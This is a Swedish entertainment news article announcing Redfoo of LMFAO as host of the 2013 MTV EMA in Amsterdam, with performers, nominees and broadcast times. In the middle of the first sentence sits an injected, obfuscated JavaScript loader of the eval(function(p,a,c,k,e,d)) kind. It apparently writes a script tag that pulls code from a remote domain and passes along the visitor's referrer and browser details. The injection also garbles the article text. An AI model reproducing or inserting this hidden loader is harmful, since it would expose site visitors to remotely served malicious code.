Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Redfoo från LMFAO leder 2013 MTV EMA

Redfoo från LMFAO leder 2013 MTV EMA
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dfbes|var|u0026u|referrer|hatyy||js|php’.split(’|’),0,{}))
tjugonde året i rad anordnar 
MTV årets internationella musikevenemang 2013 MTV EMA, som kommer att sändas söndagen den 10:e november ifrån Ziggo Dome i Amsterdam. Nu står det klart att The Killers kommer att uppträda på den gigantiska scenen och att Redfoo från LMFAO kommer att vara värd för galan. Dessutom kommer Nickelodeon-stjärnan Ariana Grande att rapportera från backstageområdet och ge tittarna en exklusiv inblick i kändisarnas liv.

Rockbandet The Killers ansluter till den storslagna artistensemblen som uppträder på MTV’s stora gala i Amsterdam. Medan de tillsammans med Katy Perry antar scenen kommer Redfoo från LMFAO leda evenemanget. Nya stjärnskottet Ariana Grande kommer bjuda på exklusivt backstagematerial genom sociala medier och legendariska Ron Burgundy (Will Ferell) är gästreporter. Men det är inte klart här; ännu fler kändisar, artister och överraskningar tillkännages inom kort.

”So excited to add some ridiculousness to this crazy party, whooooooooooo!”, säger Redfoo om sitt eminenta uppdrag som programledare för 2013 MTV EMA.

Justin Timberlake och Macklemore & Ryan Lewis leder med flest nomineringar – hela fem stycken. Lady Gaga, Justin Bieber, Miley Cyrus och Robin Thicke har fyra nomineringar var. Andra artiser som är nomierade för galan är: Taylor Swift, Bruno Mars, Green Day, Thirty Seconds of Mars, Daft Punk, Rudimnetal, Icona Pop, One Direction, Rihanna, Katy Perry, Eminen, Jay Z, The Killers, Rita Ora, Afrojack, Avicii och Calvin Harris.

2013 MTV EMA-promo med Redfoo att använda online:

http://media.mtvnservices.com/embed/mgid:arc:video:mtvema.com:fa738647-a1b3-4133-a691-a2ee969f67c0

Sändningstid

2013 MTV EMA sänds söndagen den 10 november kl. 21.00 på MTV. De som vill se artisterna göra entré på röda mattan ska slå på TV:n en timme tidigare, kl. 20.00.